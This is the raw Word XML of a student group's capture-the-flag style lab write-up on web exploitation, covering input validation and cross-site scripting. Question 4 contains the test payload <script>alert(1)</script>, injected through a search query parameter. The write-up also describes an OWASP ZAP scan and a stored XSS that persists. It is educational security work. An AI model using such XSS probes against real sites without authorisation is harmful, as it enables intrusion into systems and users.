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5778" w14:textId="77777777" w:rsidR="003718D1" w:rsidRPr="00944FF7" w:rsidRDefault="003718D1" w:rsidP="003718D1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="160"/>
          <w:szCs w:val="160"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00944FF7">
        <w:rPr>
          <w:sz w:val="160"/>
          <w:szCs w:val="160"/>
        </w:rPr>
        <w:t xml:space="preserve">PSP0201 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDF8736" w14:textId="2AC453F1" w:rsidR="003718D1" w:rsidRPr="00944FF7" w:rsidRDefault="003718D1" w:rsidP="003718D1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="160"/>
          <w:szCs w:val="160"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00944FF7">
        <w:rPr>
          <w:sz w:val="160"/>
          <w:szCs w:val="160"/>
        </w:rPr>
        <w:t xml:space="preserve">Week </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="160"/>
          <w:szCs w:val="160"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D52FCAF" w14:textId="77777777" w:rsidR="003718D1" w:rsidRPr="00944FF7" w:rsidRDefault="003718D1" w:rsidP="003718D1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="160"/>
          <w:szCs w:val="160"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00944FF7">
        <w:rPr>
          <w:sz w:val="160"/>
          <w:szCs w:val="160"/>
        </w:rPr>
        <w:t>Writeup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B485CA" w14:textId="77777777" w:rsidR="003718D1" w:rsidRDefault="003718D1" w:rsidP="003718D1"/>
    <w:p w14:paraId="0F7D636A" w14:textId="77777777" w:rsidR="003718D1" w:rsidRDefault="003718D1" w:rsidP="003718D1"/>
    <w:p w14:paraId="585B827E" w14:textId="77777777" w:rsidR="003718D1" w:rsidRDefault="003718D1" w:rsidP="003718D1"/>
    <w:p w14:paraId="49AA0353" w14:textId="77777777" w:rsidR="003718D1" w:rsidRDefault="003718D1" w:rsidP="003718D1"/>
    <w:p w14:paraId="1A4E620B" w14:textId="77777777" w:rsidR="003718D1" w:rsidRDefault="003718D1" w:rsidP="003718D1"/>
    <w:p w14:paraId="4C140022" w14:textId="77777777" w:rsidR="003718D1" w:rsidRDefault="003718D1" w:rsidP="003718D1">
      <w:r>
        <w:t xml:space="preserve">Group Name: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GL</w:t>
      </w:r>
      <w:r>
        <w:t>M</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365604C6" w14:textId="77777777" w:rsidR="003718D1" w:rsidRDefault="003718D1" w:rsidP="003718D1">
      <w:r>
        <w:t>Members</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1332"/>
        <w:gridCol w:w="3870"/>
        <w:gridCol w:w="3814"/>
      </w:tblGrid>
      <w:tr w:rsidR="003718D1" w14:paraId="73616336" w14:textId="77777777" w:rsidTr="00EA2ECC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D01F367" w14:textId="77777777" w:rsidR="003718D1" w:rsidRPr="00D42680" w:rsidRDefault="003718D1" w:rsidP="00EA2ECC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D42680">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EE3773A" w14:textId="77777777" w:rsidR="003718D1" w:rsidRPr="00D42680" w:rsidRDefault="003718D1" w:rsidP="00EA2ECC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D42680">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4031" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2761F0D8" w14:textId="77777777" w:rsidR="003718D1" w:rsidRPr="00D42680" w:rsidRDefault="003718D1" w:rsidP="00EA2ECC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D42680">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003718D1" w14:paraId="3708BEC1" w14:textId="77777777" w:rsidTr="00EA2ECC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A27F929" w14:textId="77777777" w:rsidR="003718D1" w:rsidRDefault="003718D1" w:rsidP="00EA2ECC">
            <w:r>
              <w:t>1211102971</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A8EA57C" w14:textId="77777777" w:rsidR="003718D1" w:rsidRDefault="003718D1" w:rsidP="00EA2ECC">
            <w:r>
              <w:t>Leong Chun Kit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4031" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D6F6F2B" w14:textId="77777777" w:rsidR="003718D1" w:rsidRDefault="003718D1" w:rsidP="00EA2ECC">
            <w:r>
              <w:t>Leader</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003718D1" w14:paraId="4F425F7A" w14:textId="77777777" w:rsidTr="00EA2ECC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="658ACEF3" w14:textId="77777777" w:rsidR="003718D1" w:rsidRDefault="003718D1" w:rsidP="00EA2ECC">
            <w:r>
              <w:t>1211103023</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19321C24" w14:textId="77777777" w:rsidR="003718D1" w:rsidRDefault="003718D1" w:rsidP="00EA2ECC">
            <w:r>
              <w:t>Yap Weng Hong</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4031" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="326E5F14" w14:textId="77777777" w:rsidR="003718D1" w:rsidRDefault="003718D1" w:rsidP="00EA2ECC">
            <w:r>
              <w:t>Member</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003718D1" w14:paraId="4BB63958" w14:textId="77777777" w:rsidTr="00EA2ECC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4055A3A9" w14:textId="77777777" w:rsidR="003718D1" w:rsidRDefault="003718D1" w:rsidP="00EA2ECC">
            <w:r>
              <w:t>1211101232</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30746A27" w14:textId="77777777" w:rsidR="003718D1" w:rsidRDefault="003718D1" w:rsidP="00EA2ECC">
            <w:r>
              <w:t>Lim Kai Qian</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4031" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D193940" w14:textId="77777777" w:rsidR="003718D1" w:rsidRDefault="003718D1" w:rsidP="00EA2ECC">
            <w:r>
              <w:t>Member</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003718D1" w14:paraId="5734DE4E" w14:textId="77777777" w:rsidTr="00EA2ECC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28C2D0CB" w14:textId="77777777" w:rsidR="003718D1" w:rsidRDefault="003718D1" w:rsidP="00EA2ECC">
            <w:r>
              <w:t>1211101407</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54D0BDD5" w14:textId="77777777" w:rsidR="003718D1" w:rsidRDefault="003718D1" w:rsidP="00EA2ECC">
            <w:r>
              <w:t>Tan Fu Shun</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4031" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="670F7629" w14:textId="77777777" w:rsidR="003718D1" w:rsidRDefault="003718D1" w:rsidP="00EA2ECC">
            <w:r>
              <w:t>Member</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="22414741" w14:textId="77777777" w:rsidR="003718D1" w:rsidRDefault="003718D1" w:rsidP="003718D1"/>
    <w:p w14:paraId="3D575830" w14:textId="77777777" w:rsidR="003718D1" w:rsidRDefault="003718D1" w:rsidP="003718D1"/>
    <w:p w14:paraId="5ADEFF87" w14:textId="77777777" w:rsidR="003718D1" w:rsidRDefault="003718D1" w:rsidP="003718D1"/>
    <w:p w14:paraId="37FDD2EF" w14:textId="77777777" w:rsidR="003718D1" w:rsidRDefault="003718D1" w:rsidP="003718D1"/>
    <w:p w14:paraId="1F91DC17" w14:textId="77777777" w:rsidR="003718D1" w:rsidRDefault="003718D1" w:rsidP="003718D1"/>
    <w:p w14:paraId="39B519D9" w14:textId="77777777" w:rsidR="003718D1" w:rsidRDefault="003718D1" w:rsidP="003718D1"/>
    <w:p w14:paraId="73AD7C36" w14:textId="77777777" w:rsidR="003718D1" w:rsidRDefault="003718D1" w:rsidP="003718D1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AE598F3" w14:textId="77777777" w:rsidR="00103190" w:rsidRPr="0081607E" w:rsidRDefault="00103190" w:rsidP="00103190">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Day 6</w:t>
      </w:r>
      <w:r w:rsidRPr="0081607E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Exploitation – </w:t>
      </w:r>
      <w:r w:rsidRPr="00D85865">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Be careful with what you wish on a Christmas night</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65298BB3" w14:textId="77777777" w:rsidR="00103190" w:rsidRDefault="00103190" w:rsidP="00103190">
      <w:r w:rsidRPr="002355FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tools used</w:t>
      </w:r>
      <w:r>
        <w:t>: Kali Linux, Firefox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E141AD" w14:textId="2261CD35" w:rsidR="00103190" w:rsidRDefault="00103190" w:rsidP="00103190">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution/walkthrough</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0A34A9" w14:textId="16E8ED53" w:rsidR="00DF4AA6" w:rsidRDefault="00DF4AA6" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E55429" w14:textId="712EDB05" w:rsidR="00DF4AA6" w:rsidRDefault="00DF4AA6" w:rsidP="00103190">
      <w:r>
        <w:t xml:space="preserve">Browse the URL </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00BB538F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Input_Validation_Cheat_Sheet.md</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D954D4C" w14:textId="4DBA7D15" w:rsidR="00DF4AA6" w:rsidRPr="00DF4AA6" w:rsidRDefault="001941B3" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001941B3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="065D7AD4" wp14:editId="1CD8A56B">
            <wp:extent cx="1625600" cy="361250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6443" cy="3658820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAF425D" w14:textId="72EA4884" w:rsidR="00103190" w:rsidRDefault="00103190" w:rsidP="00103190"/>
    <w:p w14:paraId="20ECF1E2" w14:textId="715DA3AA" w:rsidR="00DF4AA6" w:rsidRDefault="00DF4AA6" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305C928A" w14:textId="6A6E939E" w:rsidR="00DF4AA6" w:rsidRDefault="00DF4AA6" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Browse the URL </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00BB538F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Input_Validation_Cheat_Sheet.md</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F71AB55" w14:textId="3B168D17" w:rsidR="00DF4AA6" w:rsidRPr="00DF4AA6" w:rsidRDefault="001941B3" w:rsidP="00103190">
      <w:r w:rsidRPr="001941B3">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B2F7B4D" wp14:editId="200E7AFE">
            <wp:extent cx="1625600" cy="36125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0702" cy="3646062"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4263CC80" w14:textId="2F220C49" w:rsidR="00DF4AA6" w:rsidRDefault="00DF4AA6" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="483E17F9" w14:textId="75E9BFA6" w:rsidR="00DF4AA6" w:rsidRDefault="00DF4AA6" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236A4648" w14:textId="302C7311" w:rsidR="00DF4AA6" w:rsidRDefault="00907C7E" w:rsidP="00103190">
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00907C7E">
        <w:t>ince it came up every single time as referenced by the text at the top that would been stored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1932BC06" w14:textId="009FB3D3" w:rsidR="00BD0B76" w:rsidRDefault="00907C7E" w:rsidP="00103190">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09C259CE" wp14:editId="715CDA1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D6B45" w14:textId="6FE92DE0" w:rsidR="00BD0B76" w:rsidRDefault="00BD0B76" w:rsidP="00103190"/>
    <w:p w14:paraId="052272BE" w14:textId="77777777" w:rsidR="00907C7E" w:rsidRDefault="00BD0B76" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36648A1E" w14:textId="2B3FB341" w:rsidR="00BD0B76" w:rsidRDefault="00AA5C9A" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5C9A">
        <w:t>irst</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5C9A">
        <w:t xml:space="preserve"> we have to search query by using &lt;script&gt;alert(1)&lt;/script&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5C9A">
        <w:t>thn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5C9A">
        <w:t xml:space="preserve"> it will show the result which we search is 1 after that we saw the link will be longer and the query string we saw that is q which can </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5C9A">
        <w:lastRenderedPageBreak/>
        <w:t>be abused to craft a reflected XSS</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00384953" w:rsidRPr="00384953">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E706B9C" wp14:editId="31872AB3">
            <wp:extent cx="5731510" cy="3166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6745"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB7BE09" w14:textId="068CFB7B" w:rsidR="00384953" w:rsidRPr="00BD0B76" w:rsidRDefault="00384953" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7173FC12" wp14:editId="1A7D01BB">
            <wp:extent cx="5731510" cy="31121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3ACC994B" w14:textId="55A37C31" w:rsidR="00DF4AA6" w:rsidRDefault="00384953" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EF9CA45" wp14:editId="75434C9A">
            <wp:extent cx="5731510" cy="3277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63412BC5" w14:textId="42D144E6" w:rsidR="00DF4AA6" w:rsidRDefault="00DF4AA6" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="714D101B" w14:textId="6E023567" w:rsidR="00384953" w:rsidRDefault="00384953" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C7A35B" w14:textId="13724999" w:rsidR="00384953" w:rsidRDefault="00384953" w:rsidP="00103190">
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00384953">
        <w:t>s we open the OWASP Zap, we copy the title and paste inside then start attack, we would find that there are 2 alerts of high priority are in the scan</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227E2CA7" w14:textId="24BD6018" w:rsidR="00384953" w:rsidRDefault="00384953" w:rsidP="00103190">
      <w:r w:rsidRPr="00384953">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A22171D" wp14:editId="771611FF">
            <wp:extent cx="5731510" cy="32124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2465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="101C4752" w14:textId="74F831ED" w:rsidR="00384953" w:rsidRPr="00384953" w:rsidRDefault="00384953" w:rsidP="00103190">
      <w:r w:rsidRPr="00384953">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70A03BA5" wp14:editId="15589238">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3ACEBA4" w14:textId="6F0B1C1B" w:rsidR="00DF4AA6" w:rsidRDefault="00DF4AA6" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18422DD3" w14:textId="239D203E" w:rsidR="00384953" w:rsidRDefault="00384953" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEAB7C6" w14:textId="5A92B3A2" w:rsidR="001941B3" w:rsidRDefault="001941B3" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Browse the URL </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00BB538F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Input_Validation_Cheat_Sheet.md</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3895ABD2" w14:textId="4ACA76A5" w:rsidR="00384953" w:rsidRDefault="005B4C87" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4C87">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D6EE66C" wp14:editId="23F2E815">
            <wp:extent cx="2054225" cy="35433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525" cy="3562791"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="543663B1" w14:textId="77777777" w:rsidR="005B4C87" w:rsidRDefault="005B4C87" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B8AF94F" w14:textId="27B55537" w:rsidR="00384953" w:rsidRDefault="00384953" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7292E4E3" w14:textId="7299B3A4" w:rsidR="00384953" w:rsidRDefault="00384953" w:rsidP="00103190">
      <w:r w:rsidRPr="00384953">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">As </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00384953">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00384953">
        <w:t xml:space="preserve"> close my browser and revisit the site again,  XSS will also attack persist</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8D9B29" w14:textId="656BCDE7" w:rsidR="00384953" w:rsidRDefault="00384953" w:rsidP="00103190">
      <w:r w:rsidRPr="00384953">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B5B536C" wp14:editId="5F94AADD">
            <wp:extent cx="5731510" cy="3200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00400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C70D27" w14:textId="50D83E37" w:rsidR="00384953" w:rsidRDefault="00384953" w:rsidP="00103190"/>
    <w:p w14:paraId="23E225ED" w14:textId="77777777" w:rsidR="00001EBC" w:rsidRPr="004015BA" w:rsidRDefault="00001EBC" w:rsidP="00001EBC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004015BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Thought Process/Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C929FBA" w14:textId="6B250E3A" w:rsidR="00AA5C9A" w:rsidRDefault="00001EBC" w:rsidP="00AA5C9A">
      <w:r>
        <w:t xml:space="preserve">First, we can </w:t>
      </w:r>
      <w:r w:rsidRPr="00001EBC">
        <w:t xml:space="preserve">Browse the URL </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00BB538F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/OWASP/Cheat</w:t>
        </w:r>
        <w:r w:rsidRPr="00BB538F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>S</w:t>
        </w:r>
        <w:r w:rsidRPr="00BB538F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>heetSeries</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AA5C9A">
        <w:t xml:space="preserve"> to find the question 1,2 and 6. </w:t>
      </w:r>
      <w:r w:rsidR="00AA5C9A" w:rsidRPr="00AA5C9A">
        <w:t>Since it came up every single time as referenced by the text at the top that would been stored</w:t>
      </w:r>
      <w:r w:rsidR="00AA5C9A">
        <w:t>. A</w:t>
      </w:r>
      <w:r w:rsidR="00AA5C9A" w:rsidRPr="00AA5C9A">
        <w:t>s we open the OWASP Zap, we copy the title and paste inside then start attack, we would find that there are 2 alerts of high priority are in the scan</w:t>
      </w:r>
      <w:r w:rsidR="00AA5C9A">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00AA5C9A" w:rsidRPr="00384953">
        <w:t xml:space="preserve">As </w:t>
      </w:r>
      <w:r w:rsidR="00AA5C9A">
        <w:t xml:space="preserve">we </w:t>
      </w:r>
      <w:r w:rsidR="00AA5C9A" w:rsidRPr="00384953">
        <w:t>close my browser and revisit the site again,  XSS will also attack persist</w:t>
      </w:r>
      <w:r w:rsidR="00AA5C9A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
